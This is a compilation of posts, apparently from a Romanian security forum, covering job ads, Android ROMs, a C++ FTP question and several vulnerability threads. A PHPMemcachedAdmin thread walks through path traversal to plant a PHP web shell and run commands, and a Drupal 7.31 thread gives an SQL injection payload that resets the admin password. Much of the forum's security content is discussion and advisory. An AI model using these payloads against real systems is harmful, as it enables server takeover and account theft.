[Local root exploit need it!]

Sorry de edit, nu merită ajutat. E doar un cerșetor!

[The device is vulnerable to hacker attacks.from the wifi bell 192.168.2.1]

Can you provide us with more information? Do you have a backdoored/vulnerable Bell router? Are you affected by this:

 

http://www.dslreports.com/forum/r30443059-Bell-Home-Hub-2000-Backdoor-Security-vulnerability

[[Magic] [C] Fast inverse square root]

Ceva "magie" pentru pasionatii hack-urilor de genul. Daca vreti sa aflati ce face si cum functioneaza urmatoarea functie:

float InvSqrt(float x) {
    float xhalf = 0.5 f * x;
    int i = * (int * ) & x; // get bits for floating value
    i = 0x5f3759df - (i >> 1); // gives initial guess y0
    x = * (float * ) & i; // convert bits back to float
    x = x * (1.5 f - xhalf * x * x); // Newton step, repeating increases accuracy
    return x;
}

Puteti citi:

http://www.lomont.org/Math/Papers/2003/InvSqrt.pdf

https://en.wikipedia.org/wiki/Fast_inverse_square_root

[vBulletin < 4.2.2 - Memcache Remote Code Execution]

Pune validare ca avatarurl sa fie un URL valid sau poti face strip la localhost (plus variante). Oricum functioneaza doar daca se foloseste Memcached.

[salut]

Bine ai venit!

[Sysadmin/PHP dev/Mobile dev/QA]

Locatie: Bucure?ti. PM pentru mai multe detalii.

[c++ conectare server ftp]

Am rezolvat intr-un fel, dar acum...

#include <iostream>
#include<windows.h>
#include<fstream>

using namespace std;

int main()
{   string nume;
char mesaj[60];
    ofstream g("c:\\Windows\\windows.txt");
    g<<"open ftp.site\n";
    g<<"username\n";
    g<<"parola\n";
    g.close();
    system("cd C:\\Windows");
    system("ftp -s:windows.txt");
    system("bin");
    system("get test.rar");
    ofstream chat("chat.txt", ios::app);
    cout<<"Introdu numele tau.MAXIM 6 CARACTERE";
    cin>>nume;
    cout<<"Introdu mesajul";
    cin.getline(mesaj,100);
    chat<<nume<<":"<<mesaj<<endl;
    chat.close();


}

Totul se opreste dupa " system("ftp -s:windows.txt");", chiar daca in fisierul windows.txt as baga alte comenzi...

Pai cum sa mearg?, faci aceea?i gre?eal?. Tu te folose?ti de system() ?i execu?i comenzile pe rand. Este echivalentul a: deschizi terminal, te conectezi la FTP, închizi terminal, deschizi terminal ?i introduci o comanda FTP. Doar ca tu nu mai e?ti conectat la FTP, "sesiunea de terminal" nu mai este aceea?i. Rulezi comanda FTP în sistem.

Ca ?i exemplu general, folose?te o libr?rie care î?i întoarce o conexiune/sesiune/obiect ce reprezinta sesiunea activ?, ?i folose?te-te de ea pentru a executa comenzi succesive.

Eu am avut o experienta asem?nare cu SSH, în alt limbaj, dar probabil exista ceva asem?n?tor ?i în C++.

[Windows Phone sau Android ?]

Si mie mi-a trecut prin cap sa trec la Windows Phone, mai exact la Nokia Lumia 930. Chiar daca are tot ce trebuie, ce ma tine departe este faptul ca nu are aplicatii native de la Google (GMail, Google Maps, Chrome etc.) si, pentru ca nu o sa folosesc aplicatii 3rd party pentru servicii de genul, ma obliga sa trec pe OneDrive, Nokia Maps, Outlook, Internet Explorer etc.

[ElasticSearch Unauthenticated Remote Code Execution]

Rezolvare (debian way):

echo  "script.groovy.sandbox.enabled = false" >> /etc/elasticsearch/elasticsearch.yml
/etc/init.d/elasticsearch restart

Daca vreti mai profi, restrictionati pe IP. Exemplu:

iptables -A INPUT -p tcp --dport 9200:9300 -s your_fucking_ip_address -j ACCEPT
iptables -A INPUT -p tcp --dport 9200:9300 -j DROP

Cred ca nu stii ce e elasticsearch.

Dac? ar ?ti Aerosol tot ce posteaz?, ne-ar pune în cur pe to?i.

[[Pareri] Interviu Web Developer / Programator PHP]

Ca tot am sa fiu si eu invitat maine la un interviu, m-am luat dupa @MrGrj si am creat si eu un off-topic ca sa-mi ridic moralu'. La ce as putea sa ma astept? Avand in vedere ca n-am primit niciun detaliu ... Mi s-a spus doar ca sa ma "pregatesc tehnic".

Cerintele angajatorului:

Job-ul e entry / middle. Vreau ca sa va spun ca n-am experienta intr-o echipa sau plm, nu sunt As la PHP - ii inteleg conceptul si cum functioneaza, dar nu ii stiu toate functiil si mi-e mai greu cu clasele. Deja e al 5-lea interviu si nu vreau sa-l ratez, pana la asta numa muie mi-am luat .

Astia care activati in domeniu, spuneti-mi de unde sa o iau.

Stai asa. Tu aplici la un job junior/middle la care se cere experienta de 1-2 ani ?i "?i-e greu cu clasele"? De ce ai impresia ca po?i sa te angajezi ca junior ?tiind 5 func?ii ?i 3 condi?ii, toate c?utate pe Google?

La un post de junior ?i chiar internship, la orice firma decenta, ai nevoie de cuno?tin?e solide de OOP, sa nu stai 3 ore sa încerci sa instantiezi o clasa abstracta.

În JavaScript n-o sa te pun? sa scrii alert-uri ?i nu o sa stea dup? tine 3 ore sa pui un hide onclick.

La MySQL nu o sa faci doar select-uri si insert-uri ?i nu o sa stea dup? tine 3 ore sa faci 5 join-uri sau sa pui 3 indec?i unde trebuie.

Ar fi bine sa fi lucrat cu câteva librarii, sa ai habar de performanta ?i securitate, sa ?tii ce e ala SPL. Sa scrii cod lizibil ?i extensibil. Sa fi lucrat/ai habar de un framework popular.

Trebuie sa nu fie nevoie sa cau?i pe Google MYISAM, InnoDB, cum sa instalezi o extensie de PHP sau cum sa faci un commit pe SVN.

Lista poate continua la nesfâr?it. Un post de Junior nu înseamn? un post de novice în limbajul respectiv. O sa înve?i pe parcurs, dar trebuie sa vii ?i tu cu ceva consistent.

[How to install Android 5.0.1 Lollipop on Samsung Galaxy S4]

@all:

Problema cu camera am rezolvat-o folosind ceva 3rd party: Camera Zoom FX.

Il legatura cu silent mode, a fost introdus un nou concept, il poti accesa de pe butoanele de volum: este configurabil si mai interesant decat inainte.

Eu zic ca se merita, pe langa cateva bug-uri minore. Se misca mult mai bine, arata mult mai bine, are built-in features bune (e.g. privacy manager). Doar ca ramai fara softurile proprietare Samsung.

[Joburi pe: Java, QA, Lead Sysadmin, PHP]

ca sa primesti tu un bonus de 300 euro ca asa a spus la tv

Da, boss, m-ai prins... Primesc 10.000 Euro si m-am gandit ca din 150.000 de membri cat are RST fac de Ferrari-ul pe care mi-l doresc inca din clasa a 5-a. Si asta doar pe spatele tau si al RST-ului, muhahaha!

[Joburi pe: Java, QA, Lead Sysadmin, PHP]

Dupa cum spune si titlul, se cauta: Java Enterprise dev, QA Engineer, Lead Sysadmin si PHP developer. Pentru detalii PM. Locatie: Bucuresti.

[problema CyanomegeMod]

Cam astia ar fi pasii, in mare:

1. Rooteaza telefonul (e.g. CF-Auto-Root)

2. Flash-uieste un recovery cu Odin (e.g. TWRP)

3. Flash-uieste un ROM din recovery

Citeste thread-urile sticky de aici si vei stii tot ce e nevoie:

Samsung Galaxy S 4 i9500, i9505, i9505G, i9506 - XDA Forums

PS:

- fa un backup la EFS

- ca sa folosesti Odin trebuie sa fii in download mode)

- inainte sa flash-uiesti un ROM fa un backup din recovery si apoi un wipe system/data

Eu de curand mi-am instalat, tot pe S4, Android 5.0.1 Lollipop, mai multe detalii aici:

[ROM][5.0.1][unofficial] CyanogenMod 12.0 | Samsung Galaxy S 4 i9500, i9505, i9505G, i9506 | XDA Forums

Merge brici, nu am intampinat niciun bug momentan.

[[Path disclosure & code execution] juncture.ro]

Boss, pai ce faci, vii cu rezultatele unui scanner la show off?

[Cine vine la DefCamp de p-aici?]

+1

[Problema telefon]

Incearca sa schimbi aplicatia de mesagerie default.

[Tricou RST]

Si eu vreau. Ca si model, ceva de genul asta ar fi ok:

Logo si "Romanian Security Team" in culori, si motto-ul sub.

[PHPMemcachedAdmin 1.2.2 Remote Code Execution]

How can i use it?

It is not an exploit, it is an advisory (few details are published at the moment). However, we can check for ourselves:

Let's take a look at stats.php:

if(!isset($_COOKIE['live_stats_id' . $hash]))
{
...
}
else
{
    # Backup from a previous request
    $live_stats_id = $_COOKIE['live_stats_id' . $hash];
}

If the

'live_stats_id' . $hash

cookie is not set, it is created (with values that we can change). Take a look here:

$hash is:

$hash = md5($_GET['cluster']);

and cluster is a variable that we can simply set via a GET request:

if(isset($_GET['cluster']) && ($_GET['cluster'] != null)){    $cluster = $_GET['cluster'];}

So, if we set the $cluster variable to test, the cookie name should become:

live_stats_id098f6bcd4621d373cade4e832627b4f6

The we can see that the $live_stats_id variable, which can be controlled by us, is concatenated to the end of the $file_path variable:

$file_path = rtrim($_ini->get('file_path'), '/') . DIRECTORY_SEPARATOR . 'live_stats.' . $live_stats_id;

The $file_path variable will become:

Temp/live_stats.1022488408098f6bcd4621d373cade4e832627b4f6

We can change the cookie value to "/../../rce.php", so $file_path will become:

Temp/live_stats./../../rce.php

Then we can see that a file called rce.php has been created in the root directory.

Now we must write code that allows us to execute commands. We go to "Edit configuration" (http://127.0.0.1/configure.php) and set this code as the hostname (of course, you can use any PHP code you want):

<?php system($_GET['cmd']);?>

Then save the configuration. Now all you have to execute your command (example):

http://127.0.0.1/rce.php?cmd=whoami

And you'll get:

a:1:{s:33:"[COLOR=#ff0000][B]www-data[/B][/COLOR] :123";a:1:{s:10:"query_time";i:1;}}

Have fun, I hope you learned something.

[Reflected File Download - A New Web Attack Vector]

1. Introduction

Reflected File Download (RFD) is a web attack vector that enables attackers to gain

complete control over a victim’s machine. In an RFD attack, the user follows a

malicious link to a trusted domain resulting in a file download from that domain.

Once executed, it’s basically "game over", as the attacker can execute commands

on the Operating System level of the client’s computer.

Content:

1. Introduction .........................................................................................................- 3 -

1.1. RFD Attack Flow ............................................................................................- 3 -

1.2. Implications...................................................................................................- 3 -

1.3. RFD Requirements.........................................................................................- 4 -

1.4. RFD & JSON ...................................................................................................- 5 -

2. Detecting RFD ......................................................................................................- 5 -

2.1. Looking for Reflected Input...........................................................................- 5 -

2.1.1. Breaking context for command execution ............................................- 6 -

2.1.2. Injection of command separators and commands................................- 7 -

2.2. Controlling the Filename...............................................................................- 7 -

2.2.1. Adding forwardslashes..........................................................................- 8 -

2.2.2. Adding Path Parameters (the semicolon character)..............................- 8 -

2.2.3. Filenames and Extensions Suitable for RFD...........................................- 9 -

2.2.4. Windows 7 security feature bypass ....................................................- 10 -

2.3. Forcing Responses to Download .................................................................- 12 -

2.3.1. Content-Type & Downloads................................................................- 12 -

2.3.2. The Content-Disposition Header.........................................................- 13 -

2.3.3. Using the Download Attribute of the Anchor Tag ...............................- 14 -

2.3.4. Download Happens, Deal with it!........................................................- 14 -

3. RFD Advanced Exploitation ................................................................................- 15 -

3.1. Exploiting RFD to gain control over all websites in Chrome ........................- 15 -

3.2. Using PowerShell as a ‘Dropper’ .................................................................- 17 -

3.3. Exploiting JSONP Callbacks to Execute Malware .........................................- 18 -

4. Mitigations.........................................................................................................- 19 -

5. Acknowledgments..............................................................................................- 20 -

Full document:

https://drive.google.com/file/d/0B0KLoHg_gR_XQnV4RVhlNl96MHM/view

[[Good stuff] OPS School]

Spor la citit.

Content:

[LIST]
[*]Introduction
[LIST]
[*]Goals and Focus
[*]Syllabus layout
[/LIST]

[*]Contributions
[LIST]
[*]How we’ll organize work
[*]How to contribute
[*]Rewards for contributions
[*]Ops School Videos
[*]How to write sections
[*]Overwriting existing content
[*]Credits
[/LIST]

[*]Guidelines
[*]Careers in Operations
[LIST]
[*]Deciding a career path
[*]Generalized career paths
[*]Specialized career paths
[*]How to become an operations engineer
[/LIST]

[*]Sysadmin 101
[LIST]
[*]What is Systems Administration?
[*]What is Development?
[*]Contrasting Development and Operations
[*]History of Development and Operations
[*]What System Administration Isn’t
[/LIST]

[*]Unix fundamentals 101
[LIST]
[*]File systems
[*]Shells
[*]Package management
[*]The Boot Process
[*]Useful shell tools
[*]Crontab
[/LIST]

[*]Unix fundamentals 201
[LIST]
[*]Kernel tuning
[*]Signals
[*]Syscalls
[*]Booting over the network
[*]/bin/init and its descendants
[*]Looking at system metrics
[/LIST]

[*]MS Windows fundamentals 101
[*]Text Editing 101
[LIST]
[*]A little history
[*]vi basics
[/LIST]

[*]Text Editing 201
[LIST]
[*]Vim
[*]Emacs
[/LIST]

[*]Tools for productivity
[LIST]
[*]Terminal emulators
[*]SSH
[*]SSH Use Cases
[*]Multiplexers
[*]Shell customisations
[*]Mosh
[*]Ticketing systems
[*]Note-taking
[/LIST]

[*]Security 101
[LIST]
[*]Authentication in unix
[*]Adding and deleting users and groups
[*]Standard unix filesystem permissions
[*]PAM
[*]Chroot, jails and containers
[*]Sudo (or, “Why you should not log in as root”)
[*]History and Lore
[/LIST]

[*]Security 201
[LIST]
[*]Centralised accounts
[*]Firewalls and packet filters
[*]Public Key Cryptography
[*]Two factor authentication
[*]Building systems to be auditable
[*]Network Intrusion Detection
[*]Host Intrusion Detection
[*]Defense practices
[*]Risk and risk management
[*]Compliance: The bare minimum
[*]Dealing with security incidents
[*]ACLs and extended attributes (xattrs)
[*]SELinux
[*]Data placement
[*]Additional reading
[/LIST]

[*]Troubleshooting
[LIST]
[*]Methodologies
[*]Working effectively during a crisis
[/LIST]

[*]Networking 101
[LIST]
[*]The RFC Documents
[*]OSI 7-layer model (OSI Reference Model)
[*]TCP/IP (ARPA) 4-layer model
[*]IP Addressing
[*]TCP vs UDP
[*]Subnetting, netmasks and CIDR
[*]Private address space (RFC 1918)
[*]Static routing
[*]NAT
[*]Networking cable
[/LIST]

[*]Networking 201
[LIST]
[*]VLANs, 802.1q tagging
[*]Spanning Tree
[*]Static Routing
[*]Dynamic routing protocols (RIP, OSPF, BGP)
[*]ACLs
[*]Network Bonding (802.3ad / LACP link aggregation)
[*]IOS switch configuration
[*]GRE and other tunnels
[*]Multi-homed hosts
[*]Similarities and differences between IPv4 and IPv6 networking
[*]Implications of dual-stack firewalls (especially under Linux)
[*]Multicast uses and limitations
[*]Latency vs. Bandwidth
[*]VPNs
[/LIST]

[*]Common services
[LIST]
[*]System daemons 101
[*]DNS 101
[*]DNS 201
[*]DHCP
[*]HTTP 101 (Core protocol)
[*]HTTP 201 (Application Servers & Frameworks)
[*]SMTP 101
[*]SMTP 201
[/LIST]

[*]Identity Management 101
[LIST]
[*]LDAP
[*]NIS
[/LIST]

[*]Active Directory 101
[LIST]
[*]What is Active Directory?
[*]What is Active Directory used for?
[*]You mention “separate components”; what is Active Directory composed of?
[*]What specific services does Active Directory provide?
[*]Best Practices for managing an Active Directory installation
[/LIST]

[*]Active Directory 201
[LIST]
[*]Detailed Breakdown of Active Directory Components/Services
[*]Advanced Active Directory Maintenance
[/LIST]

[*]Remote Filesystems 101
[LIST]
[*]NFSv3
[*]iSCSI
[*]SAMBA/CIFS
[/LIST]

[*]Remote Filesystems 201
[LIST]
[*]GlusterFS
[*]NFSv4
[*]Netatalk / AFP
[*]S3
[/LIST]

[*]Programming 101
[LIST]
[*]Shell scripting basics
[*]Regular Expressions
[*]Sed & awk
[*]GIGO
[/LIST]

[*]Programming 201
[LIST]
[*]Common elements in scripting, and what they do
[*]C (A very basic overview)
[*]Ruby
[*]Python
[*]Version Control
[*]API design fundamentals
[*]Continuous Integration
[/LIST]

[*]Hardware 101
[LIST]
[*]Hardware Types
[*]Basic server architecture
[*]Disk management
[*]Performance/Redundancy
[*]Troubleshooting
[/LIST]

[*]Datacenters 101
[LIST]
[*]Power budgets
[*]Cooling budgets
[*]You will be judged by the tidiness of your rack
[*]Machine and cable labeling
[*]Traditional naming conventions
[/LIST]

[*]Datacenters 201
[LIST]
[*]Networking many racks
[*]Power
[*]Cooling
[*]Physical security and common security standards compliance requirements
[*]Suggested practices
[/LIST]

[*]Datacenters 301
[LIST]
[*]Power
[*]Increasing cooling efficiency
[*]Design Options
[/LIST]

[*]Virtualization 101
[LIST]
[*]Intro to virtualization technologies
[*]The Cloud
[/LIST]

[*]Virtualization 201
[LIST]
[*]Managing virtualized infrastructures (Private clouds)
[*]Leveraging virtualization for development
[*]Leveraging virtualization for production
[*]Security implications of virtualization
[/LIST]

[*]Logs 101
[LIST]
[*]Common system logs & formats
[*]Standard Error
[*]Log files
[*]Syslog
[*]Log rotation, append, truncate
[*]Retention and archival
[/LIST]

[*]Logs 201
[LIST]
[*]Centralized logging
[*]Log parsing
[*]Search & Correlation
[/LIST]

[*]Databases 101 (Relational Databases)
[LIST]
[*]What is a Database?
[*]What is a Relational Database?
[*]Why We Use Databases?
[*]What is SQL?
[*]SQL shell
[*]Creating databases
[*]Creating users
[*]Create Tables
[*]Alter Table
[*]Drop Table
[*]Data Type
[*]Granting privileges
[*]Removing Privileges
[*]Basic normalized schema design
[*]Select, Insert, Update and Delete
[*]Pro Tips
[/LIST]

[*]Databases 201
[LIST]
[*]Database Theory
[*]Document Databases
[*]Key-value Stores
[*]Graph Databases
[/LIST]

[*]Application Components 201
[LIST]
[*]Message Brokers
[*]Memory Caches
[*]Specialized Caches
[/LIST]

[*]Load Balancing
[LIST]
[*]Why do we use load balancers?
[*]Application implications
[*]Non-HTTP use cases
[*]Software
[*]Hardware
[*]Multi-dc
[/LIST]

[*]Monitoring, Notifications, and Metrics 101
[LIST]
[*]History: How we used to monitor, and how we got better (monitors as tests)
[*]Perspective (end-to-end) vs Introspective monitoring
[*]Metrics: what to collect, what to do with them
[*]Common tools
[/LIST]

[*]Monitoring, Notifications, and Metrics 201
[LIST]
[*]Dataviz & Graphing
[*]Graphite, StatsD
[*]Dashboard: Info for ops and info for the business
[*]Third-party tools
[/LIST]

[*]Business Continuity Planning
[LIST]
[*]Backups
[*]Outages
[*]Postmortems
[*]Disaster Recovery
[/LIST]

[*]Architecture 101
[LIST]
[*]How to make good architecture decisions
[*]Patterns and anti-patterns
[*]Introduction to availability
[*]Introduction to scalability
[/LIST]

[*]Architecture 201
[LIST]
[*]Service Oriented Architectures
[*]Fault tolerance, fault protection, masking, dependability fundamentals
[*]Caching Concerns
[*]Crash only
[*]Synchronous vs. Asynchronous
[*]Business continuity vs. Disaster Recovery
[*]Designing for Scalability: Horizontal, Vertical
[*]Simplicity
[*]Performance
[*]Tiered architectures
[*]MTTR > MTBF
[/LIST]

[*]Configuration Management 101
[LIST]
[*]A Brief History of Configuration Management
[*]Idempotence
[*]Convergent and Congruent systems
[*]Direct and Indirect systems: ansible, capistrano
[*]Chef
[/LIST]

[*]Configuration Management 201
[LIST]
[*]Ansible
[*]Puppet
[*]Cfengine 3
[*]SaltStack
[/LIST]

[*]Capacity Planning
[LIST]
[*]Fundamentals of capacity planning
[*]Forecasting
[*]Diagonal scaling
[/LIST]

[*]Statistics For Engineers
[LIST]
[*]Normal distributions
[*]Percentiles, histograms, averages, mean, medians
[/LIST]

[*]Software Deployment 101
[LIST]
[*]Software deployment vs configuration management
[*]Running services
[*]Package management
[/LIST]

[*]Software Deployment 201
[LIST]
[*]Running services
[/LIST]

[*]Soft Skills 101
[LIST]
[*]Communication basics
[*]Communication Modes
[*]Special cases for operations
[*]Time Management
[*]Project Management
[*]The Tao of DevOps
[*]The importance of Documentation
[*]Working with other teams
[/LIST]

[*]Soft Skills 201
[LIST]
[*]Business Acumen in Operations
[*]Understanding the role of operations
[*]Thinking broadly
[*]Promoting Change
[*]Building basic business skills
[*]Specific Examples
[/LIST]

[*]Labs exercises
[LIST]
[*]Bare-Metal Provisioning 101
[*]Bare-Metal Provisioning 201
[*]Cloud Provisioning 101
[*]Cloud Provisioning 201
[*]Database 101
[*]Database 201
[*]Database 301
[*]Automation 101
[*]Automation - Chef 201
[*]Automation - Chef 301
[*]Automation - Chef 302
[*]Automation - Puppet 201
[*]Automation - Puppet 301
[*]Package Management 101
[*]Package Management 201
[*]Build automation fleets
[*]Version Control with Git 101
[*]DNS 101
[*]HTTP 101
[/LIST]

[*]Learning and the Community
[LIST]
[*]Learning and strategies for improvement
[*]Things to keep in mind as you learn how to be an engineer
[*]Golden rules for careers in ops
[*]Where to look for help in the community
[/LIST]

[*]See also
[*]Contributions
[LIST]
[*]How we’ll organize work
[*]How to contribute
[*]Rewards for contributions
[*]Ops School Videos
[*]How to write sections
[*]Overwriting existing content
[*]Credits
[/LIST]

[*]Conventions
[LIST]
[*]Style Guide
[*]Sample Network
[/LIST]

[*]Style Guide
[LIST]
[*]Editing
[/LIST]

[*]Glossary
[/LIST]

Link:

http://www.opsschool.org/en/latest/index.html

[Drupal 7.31 pre Auth SQL Injection Vulnerability]

Mersi Nytro.

Stie cineva cum se poate citi o valoare din DB in loc de update?

Hint 1:

MySQL :: MySQL 5.0 Reference Manual :: 13.2.8 SELECT Syntax

Hint 2: variabila "post_data" trebuie modificata:

"name[0%20;update+users+set+name%3d\'" \            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"

Hint 3: vector[cheie]

Hint 4: urldecode

Hint 5: escape

Hint 6: concatenare

Bafta!

[Drupal 7.31 pre Auth SQL Injection Vulnerability]

The Vulnerability

All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included:

SELECT * FROM {users} WHERE name IN (:name_0, :name_1)

This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement. The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control the $key0 and $key1 he can manipulate the SQL query to look like this:

SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test)

which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example.

If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks.

Sursa ?i articol full:

https://www.sektioneins.de/en/blog/14-10-15-drupal-sql-injection-vulnerability.html

[WPScan Vulnerability Database (Wordpress/Plugins/Themes)]

Baza de date cu vulnerabilitati in Wordpress, plugin-uri si teme. Actualizata constant.

Link:

https://wpvulndb.com/

[This POODLE bites: exploiting the SSL 3.0 fallback]

Today we are publishing details of a vulnerability in the design of SSL version 3.0. This vulnerability allows the plaintext of secure connections to be calculated by a network attacker. I discovered this issue in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers).

SSL 3.0 is nearly 15 years old, but support for it remains widespread. Most importantly, nearly all browsers support it and, in order to work around bugs in HTTPS servers, browsers will retry failed connections with older protocol versions, including SSL 3.0. Because a network attacker can cause connection failures, they can trigger the use of SSL 3.0 and then exploit this issue.

Disabling SSL 3.0 support, or CBC-mode ciphers with SSL 3.0, is sufficient to mitigate this issue, but presents significant compatibility problems, even today. Therefore our recommended response is to support TLS_FALLBACK_SCSV. This is a mechanism that solves the problems caused by retrying failed connections and thus prevents attackers from inducing browsers to use SSL 3.0. It also prevents downgrades from TLS 1.2 to 1.1 or 1.0 and so may help prevent future attacks.

Google Chrome and our servers have supported TLS_FALLBACK_SCSV since February and thus we have good evidence that it can be used without compatibility problems. Additionally, Google Chrome will begin testing changes today that disable the fallback to SSL 3.0. This change will break some sites and those sites will need to be updated quickly.

In the coming months, we hope to remove support for SSL 3.0 completely from our client products.

Thank you to all the people who helped review and discuss responses to this issue.

Sursa:

 http://googleonlinesecurity.blogspot.ro/2014/10/this-poodle-bites-exploiting-ssl-30.html